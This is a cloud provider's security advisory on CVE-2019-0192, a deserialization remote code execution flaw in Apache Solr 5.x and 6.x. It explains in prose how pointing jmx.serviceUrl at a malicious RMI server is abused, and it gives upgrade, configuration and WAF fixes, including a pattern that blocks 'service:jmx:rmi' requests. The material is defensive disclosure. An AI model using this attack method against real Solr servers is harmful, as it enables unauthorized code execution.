On March 7, 2019, Alibaba Cloud Security emergency response center detected a Solr security bulletin issued by Apache. Attackers can call the Config API and modify the jmx.serviceUrl attribute to point to a malicious RMI service, which causes a deserialization remote code execution (RCE) vulnerability in Apache Solr.
CVE ID
CVE-2019-0192
Vulnerability name
Deserialization RCE vulnerability in Apache Solr
Vulnerability description
The Config API allows to configure the jmx.serviceUrl attribute by using an HTTP POST
request. This configuration modifies the Apache Solr JMX server. Attackers can point
the request to a malicious RMI server and take advantage of the unsafe deserialization
of Solr to trigger RCE.
Affected versions
- Apache Solr 5.00 to 5.5.5
- Apache Solr 6.00 to v6.6.5
Solution
- Upgrade your Apache Solr to 7.0 or later.
- Disable the Config API by configuring
disable.configEdit=true. - Ensure that only trusted traffic is allowed to access the Solr server at the network layer.
Protection recommendations
If you do not want to upgrade Solr to resolve this vulnerability, we recommend that you use the custom protection policy feature provided by WAF to protect your business.
You can use the custom protection policy feature to restrict POST requests that contain
specific JSON data, such as service:jmx:rmi. This can also prevent RCE attacks.